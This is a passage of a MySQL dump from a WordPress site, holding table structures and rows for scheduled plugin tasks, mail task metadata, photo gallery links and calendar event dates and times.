16:03:27','2023-10-24 10:03:27','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1698163407;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1698163407;}',2,1,'2023-10-24 16:03:29','2023-10-24 10:03:29',0,NULL),(261384,'action_scheduler/migration_hook','complete','2023-11-07 16:52:45','2023-11-07 09:52:45','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1699375965;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1699375965;}',2,1,'2023-11-07 16:52:58','2023-11-07 09:52:58',0,NULL),(261375,'action_scheduler/migration_hook','failed','2023-09-20 17:05:22','2023-09-20 11:05:22','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1695229522;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1695229522;}',2,1,'2023-09-21 14:47:02','2023-09-21 08:47:02',0,NULL),(261379,'action_scheduler/migration_hook','failed','2023-10-24 15:58:18','2023-10-24 09:58:18','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1698163098;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1698163098;}',2,1,'2023-10-24 15:58:56','2023-10-24 09:58:56',0,NULL),(261373,'action_scheduler/migration_hook','failed','2023-07-19 21:13:13','2023-07-19 15:13:13','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1689801193;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1689801193;}',2,1,'2023-07-19 21:13:16','2023-07-19 15:13:16',0,NULL),(261378,'action_scheduler/migration_hook','complete','2023-10-24 15:57:14','2023-10-24 09:57:14','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1698163034;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1698163034;}',2,1,'2023-10-24 15:57:17','2023-10-24 09:57:17',0,NULL),(261386,'action_scheduler/migration_hook','failed','2023-11-12 04:01:42','2023-11-11 21:01:42','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1699761702;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1699761702;}',2,1,'2023-11-12 04:02:53','2023-11-11 21:02:53',0,NULL),(261387,'action_scheduler/migration_hook','complete','2023-11-14 21:11:32','2023-11-14 14:11:32','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1699996292;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1699996292;}',2,1,'2023-11-14 21:11:33','2023-11-14 14:11:33',0,NULL),(261388,'action_scheduler/migration_hook','failed','2023-11-14 21:12:33','2023-11-14 14:12:33','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1699996353;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1699996353;}',2,1,'2023-11-14 21:13:00','2023-11-14 14:13:00',0,NULL),(261389,'action_scheduler/migration_hook','complete','2023-11-14 21:23:27','2023-11-14 14:23:27','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1699997007;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1699997007;}',2,1,'2023-11-14 21:23:28','2023-11-14 14:23:28',0,NULL),(261390,'action_scheduler/migration_hook','failed','2023-11-14 21:24:28','2023-11-14 14:24:28','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1699997068;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1699997068;}',2,1,'2023-11-14 21:24:37','2023-11-14 14:24:37',0,NULL),(261391,'action_scheduler/migration_hook','complete','2023-11-14 22:01:28','2023-11-14 15:01:28','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1699999288;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1699999288;}',2,1,'2023-11-14 22:01:44','2023-11-14 15:01:44',0,NULL),(261392,'action_scheduler/migration_hook','failed','2023-11-14 22:02:44','2023-11-14 15:02:44','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1699999364;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1699999364;}',2,1,'2023-11-14 22:03:10','2023-11-14 15:03:10',0,NULL),(261393,'action_scheduler/migration_hook','complete','2023-11-15 17:07:11','2023-11-15 10:07:11','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1700068031;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1700068031;}',2,1,'2023-11-15 17:07:12','2023-11-15 10:07:12',0,NULL),(261394,'action_scheduler/migration_hook','failed','2023-11-15 17:08:13','2023-11-15 10:08:13','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1700068093;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1700068093;}',2,1,'2023-11-15 17:08:40','2023-11-15 10:08:40',0,NULL);
/*!40000 ALTER TABLE `wpcl_actionscheduler_actions` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_actionscheduler_actions` with 19 row(s)
--

--
-- Table structure for table `wpcl_wpmailsmtp_tasks_meta`
--

DROP TABLE IF EXISTS `wpcl_wpmailsmtp_tasks_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wpmailsmtp_tasks_meta` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `action` varchar(255) NOT NULL,
  `data` longtext NOT NULL,
  `date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=460 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wpmailsmtp_tasks_meta`
--

LOCK TABLES `wpcl_wpmailsmtp_tasks_meta` WRITE;
/*!40000 ALTER TABLE `wpcl_wpmailsmtp_tasks_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_wpmailsmtp_tasks_meta` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wpmailsmtp_tasks_meta` with 0 row(s)
--

--
-- Table structure for table `wpcl_gg_galleries_resources`
--

DROP TABLE IF EXISTS `wpcl_gg_galleries_resources`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_gg_galleries_resources` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `resource_type` enum('folder','photo') NOT NULL,
  `resource_id` int(11) NOT NULL,
  `gallery_id` int(11) NOT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=189 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_gg_galleries_resources`
--

LOCK TABLES `wpcl_gg_galleries_resources` WRITE;
/*!40000 ALTER TABLE `wpcl_gg_galleries_resources` DISABLE KEYS */;
INSERT INTO `wpcl_gg_galleries_resources` VALUES (54,'photo',54,1),(55,'photo',55,1),(56,'photo',56,1),(57,'photo',57,1),(58,'photo',58,1),(59,'photo',59,1),(60,'photo',60,1),(61,'photo',61,1),(62,'photo',62,1),(63,'photo',63,1),(64,'photo',64,1),(65,'photo',65,1),(66,'photo',66,1),(67,'photo',67,1),(68,'photo',68,1),(69,'photo',69,1),(70,'photo',70,1),(71,'photo',71,1),(72,'photo',72,1),(73,'photo',73,1),(74,'photo',74,1),(75,'photo',75,1),(76,'photo',76,1),(77,'photo',77,1),(78,'photo',78,1),(79,'photo',79,1),(80,'photo',80,1),(81,'photo',81,1),(82,'photo',82,1),(83,'photo',83,1),(84,'photo',84,1),(85,'photo',85,1),(86,'photo',86,1),(87,'photo',87,1),(88,'photo',88,1),(89,'photo',89,1),(90,'photo',90,1),(91,'photo',91,1),(92,'photo',92,1),(93,'photo',93,1),(94,'photo',94,1),(95,'photo',95,1),(96,'photo',96,1),(97,'photo',97,1),(98,'photo',98,1),(99,'photo',99,1),(100,'photo',100,1),(101,'photo',101,1),(102,'photo',102,1),(103,'photo',103,1),(104,'photo',104,1),(105,'photo',105,1),(106,'photo',106,1),(107,'photo',107,1),(108,'photo',108,1),(109,'photo',109,1),(110,'photo',110,1),(111,'photo',111,1),(112,'photo',112,1),(113,'photo',113,1),(114,'photo',114,1),(115,'photo',115,1),(116,'photo',116,1),(117,'photo',117,1),(118,'photo',118,1),(119,'photo',119,1),(120,'photo',120,1),(121,'photo',121,2),(122,'photo',122,2),(123,'photo',123,2),(124,'photo',124,2),(125,'photo',125,2),(126,'photo',126,2),(127,'photo',127,2),(128,'photo',128,2),(129,'photo',129,2),(130,'photo',130,2),(131,'photo',131,2),(132,'photo',132,2),(133,'photo',133,2),(134,'photo',134,2),(135,'photo',135,2),(136,'photo',136,2),(137,'photo',137,2),(138,'photo',138,2),(139,'photo',139,2),(140,'photo',140,2),(141,'photo',141,2),(142,'photo',142,2),(143,'photo',143,2),(144,'photo',144,2),(145,'photo',145,2),(146,'photo',146,2),(147,'photo',147,2),(148,'photo',148,2),(149,'photo',149,2),(150,'photo',150,2),(151,'photo',151,2),(152,'photo',152,2),(153,'photo',153,2),(154,'photo',154,2),(155,'photo',155,2),(156,'photo',156,2),(157,'photo',157,2),(158,'photo',158,2),(159,'photo',159,2),(160,'photo',160,2),(161,'photo',161,2),(162,'photo',162,2),(163,'photo',163,2),(164,'photo',164,2),(165,'photo',165,2),(166,'photo',166,2),(167,'photo',167,2),(168,'photo',168,2),(169,'photo',169,2),(170,'photo',170,2),(171,'photo',171,2),(172,'photo',172,2),(173,'photo',173,2),(174,'photo',174,2),(175,'photo',175,2),(176,'photo',176,2),(177,'photo',177,2),(178,'photo',178,2),(179,'photo',179,2),(180,'photo',180,2),(181,'photo',181,2),(182,'photo',182,2),(183,'photo',183,2),(184,'photo',184,2),(185,'photo',185,2),(186,'photo',186,2),(187,'photo',187,2),(188,'photo',188,2);
/*!40000 ALTER TABLE `wpcl_gg_galleries_resources` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_gg_galleries_resources` with 135 row(s)
--

--
-- Table structure for table `wpcl_mec_events`
--

DROP TABLE IF EXISTS `wpcl_mec_events`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_mec_events` (
  `id` int(10) NOT NULL AUTO_INCREMENT,
  `post_id` int(10) NOT NULL,
  `start` date NOT NULL,
  `end` date NOT NULL,
  `repeat` tinyint(4) NOT NULL DEFAULT 0,
  `rinterval` varchar(10) DEFAULT NULL,
  `year` varchar(80) DEFAULT NULL,
  `month` varchar(80) DEFAULT NULL,
  `day` varchar(80) DEFAULT NULL,
  `week` varchar(80) DEFAULT NULL,
  `weekday` varchar(80) DEFAULT NULL,
  `weekdays` varchar(80) DEFAULT NULL,
  `days` text NOT NULL DEFAULT '',
  `not_in_days` text NOT NULL DEFAULT '',
  `time_start` int(10) NOT NULL DEFAULT 0,
  `time_end` int(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`),
  UNIQUE KEY `ID` (`id`),
  UNIQUE KEY `post_id` (`post_id`)
) ENGINE=MyISAM AUTO_INCREMENT=510 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_mec_events`
--

LOCK TABLES `wpcl_mec_events` WRITE;
/*!40000 ALTER TABLE `wpcl_mec_events` DISABLE KEYS */;
INSERT INTO `wpcl_mec_events` VALUES (8,264588,'2021-11-07','2021-11-07',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(10,264608,'2021-08-08','2021-08-08',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(11,264610,'2022-05-17','2022-05-17',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,37800),(12,264611,'2021-05-16','2021-10-17',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',32400,80100),(13,264612,'2021-05-02','2021-10-03',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',32400,36900),(14,264615,'2021-05-02','2021-10-03',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',32400,36900),(15,264617,'2021-05-02','2021-10-03',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',41400,45900),(16,264618,'2021-05-09','2021-10-10',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',31500,36000),(18,264623,'2021-07-11','2021-07-11',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(20,264627,'2021-05-09','2021-10-10',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',44100,49500),(21,264630,'2021-05-16','2021-10-17',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',32400,36900),(22,264632,'2021-11-03','2022-10-05',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,73800),(23,264633,'2021-05-11','2021-10-11',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(24,264635,'2021-05-13','2021-10-17',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,73800),(26,264637,'2021-05-15','2021-05-15',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,50400),(27,264639,'2021-05-18','2021-10-17',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',64800,68400),(28,264640,'2021-05-15','2022-10-15',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',57600,61200),(31,264889,'2021-05-12','2021-05-12',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(32,264890,'2021-05-17','2021-05-17',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',54000,57600),(33,264891,'2021-05-24','2021-05-24',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(34,264893,'2021-05-23','2021-10-24',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',36000,44100),(35,264894,'2021-06-06','2022-02-06',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,43200),(37,264896,'2021-06-06','2021-11-07',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',43200,48600),(38,264898,'2021-05-10','2021-11-08',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,73800),(39,264977,'2021-06-13','2021-06-13',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(40,265063,'2021-08-22','2022-07-24',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(41,265091,'2021-06-02','2021-06-02',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(42,265095,'2021-06-09','2021-06-09',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(43,265105,'2021-06-27','2021-06-27',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(44,265134,'2021-07-11','2021-07-11',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(45,265159,'2021-06-24','2021-06-24',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(46,265166,'2021-07-19','2021-07-19',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',54000,57600),(47,265198,'2021-07-07','2021-07-07',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(48,265214,'2021-07-14','2021-07-14',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(49,265217,'2021-08-21','2021-08-21',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,50400),(50,265220,'2021-07-25','2021-07-25',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(437,268835,'2023-08-09','2023-08-09',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(52,265241,'2021-08-26','2021-08-26',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(53,265244,'2021-08-04','2021-08-04',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(54,265247,'2021-08-11','2021-08-11',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(55,265249,'2021-08-22','2021-08-22',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(56,265267,'2021-08-16','2021-08-16',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',54000,57600),(57,265269,'2021-08-23','2021-08-23',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(58,265425,'2022-01-06','2022-01-06',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',28800,64800),(59,265426,'2021-09-05','2021-09-05',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(63,265432,'2021-09-01','2021-09-01',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(64,265441,'2021-06-20','2022-03-21',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',42300,46800),(65,265539,'2021-10-06','2021-10-06',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(66,265555,'2021-09-22','2021-09-22',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,70200),(67,265559,'2021-09-29','2021-09-29',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,70200),(68,265560,'2021-10-06','2021-10-06',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,70200),(69,265561,'2021-09-19','2021-09-19',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',57600,61200),(70,265562,'2021-09-26','2021-09-26',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',57600,61200),(71,265563,'2021-10-03','2021-10-03',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',57600,61200),(72,265587,'2021-11-20','2021-11-20',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,50400),(73,265591,'2021-09-20','2021-09-20',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',54000,57600),(74,265594,'2021-09-27','2021-09-27',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(75,265639,'2021-10-19','2021-10-19',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(76,265678,'2021-10-10','2021-10-10',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(77,265681,'2021-10-19','2022-07-19',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',28800,64800),(78,265691,'2021-10-18','2021-10-18',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',54000,57600),(79,265695,'2021-04-22','2021-04-22',0,'','','','','','','','','',28800,64800),(83,265758,'2021-11-14','2021-11-14',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(84,265831,'2021-10-28','2021-10-28',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,70200),(85,265832,'2021-11-17','2021-11-17',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,70200),(86,265835,'2021-12-08','2021-12-08',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,70200),(87,265836,'2021-12-01','2021-12-01',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,70200),(88,265839,'2021-12-15','2021-12-15',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,70200),(89,265857,'2021-11-03','2021-11-03',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,72000),(90,265861,'2021-11-10','2021-11-10',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,72000),(91,265864,'2021-11-03','2021-11-03',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(92,265869,'2021-11-16','2021-11-16',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(93,265871,'2021-12-01','2021-12-01',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(94,265874,'2021-11-15','2021-11-15',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',54000,57600),(95,265877,'2021-11-22','2021-11-22',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(96,265900,'2021-12-01','2021-12-01',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(97,265904,'2021-11-14','2022-10-09',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',45000,49500),(98,265906,'2021-11-15','2022-10-17',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,73800),(99,265907,'2021-11-04','2022-10-06',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',67500,70200),(100,265908,'2022-02-08','2023-01-10',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,73800),(101,265909,'2021-11-20','2022-10-15',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',57600,63000),(102,265910,'2021-11-28','2022-10-23',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',32400,80100),(103,265911,'2021-11-21','2022-10-16',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',32400,36900),(104,265913,'2021-11-07','2022-10-02',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',85500,85500),(105,265915,'2021-11-10','2022-10-12',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,73800),(106,265917,'2021-12-13','2023-02-13',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,73800),(108,265918,'2021-11-11','2022-10-13',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,73800),(109,265920,'2021-11-14','2022-10-09',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',31500,36000),(110,265922,'2021-11-07','2022-10-02',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',32400,36900),(111,266035,'2021-12-05','2021-12-05',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(113,266042,'2022-01-23','2022-01-23',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(114,266053,'2021-12-12','2021-12-12',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(115,266056,'2022-01-09','2022-01-09',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,37800),(116,266062,'2022-01-02','2022-01-02',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(117,266078,'2021-12-20','2021-12-20',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',54000,57600),(118,266081,'2021-12-21','2021-12-21',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(119,266084,'2021-12-27','2021-12-27',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(120,266103,'2022-02-19','2022-02-19',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,50400),(121,266106,'2022-02-19','2022-02-19',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,50400),(122,266109,'2022-01-05','2022-01-05',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(123,265919,'2021-11-09','2022-09-19',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,73800),(125,266122,'2022-01-16','2022-01-16',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,50400),(126,266153,'2022-01-17','2022-01-17',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',54000,57600),(127,266154,'2022-01-17','2022-01-17',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',54000,57600),(128,266157,'2022-01-24','2022-01-24',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(129,266159,'2022-01-18','2022-01-18',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(130,266161,'2022-01-18','2022-01-18',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(485,269146,'2023-10-06','2023-10-06',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-10-07:2023-10-07:10-00-AM:05-00-PM,2023-10-08:2023-10-08:10-00-AM:05-00-PM','',36000,61200),(134,266169,'2022-02-13','2022-02-13',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(135,266170,'2022-02-13','2022-02-13',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(138,266177,'2022-01-30','2022-01-30',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,50400),(139,266178,'2022-01-30','2022-01-30',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,50400),(140,266185,'2022-02-11','2022-02-11',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(141,266187,'2022-02-11','2022-02-11',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(142,266188,'2022-03-11','2022-03-11',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(143,266190,'2022-03-11','2022-03-11',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(144,266191,'2022-04-08','2022-04-08',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(145,266192,'2022-04-08','2022-04-08',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(146,266194,'2022-02-02','2022-02-02',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(147,266195,'2022-03-02','2022-03-02',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(148,266196,'2022-02-21','2022-02-21',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',54000,57600),(149,266198,'2022-02-28','2022-02-28',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(150,266199,'2022-02-28','2022-02-28',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(151,266201,'2022-02-06','2022-02-06',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(152,266206,'2022-02-13','2022-02-13',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,54000),(153,266209,'2022-02-27','2022-02-27',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,50400),(154,266211,'2022-03-13','2022-03-13',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(155,266212,'2022-04-24','2022-04-24',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(156,266250,'2022-02-15','2022-02-15',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(157,266292,'2022-03-06','2022-03-06',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(158,266293,'2022-03-13','2022-03-13',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(159,266296,'2022-02-27','2022-02-27',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(160,266297,'2022-02-27','2022-02-27',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(161,266298,'2022-03-27','2022-03-27',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(162,266300,'2022-03-27','2022-03-27',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(164,266306,'2022-03-13','2022-03-13',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(165,266308,'2022-03-20','2022-03-20',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(166,266312,'2022-03-27','2022-03-27',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(167,266314,'2022-03-27','2022-03-27',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(168,266315,'2022-03-15','2023-02-21',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(169,266316,'2022-03-20','2022-03-20',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(170,266311,'2022-01-23','2022-01-23',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(171,266318,'2023-02-18','2023-12-16',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,43200),(172,266320,'2022-03-15','2022-03-15',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(174,266323,'2022-03-15','2022-03-15',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(175,266354,'2022-03-28','2022-03-28',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(176,266356,'2022-03-21','2022-03-21',0,NULL,NULL,NULL,NULL,NULL,NULL,NUL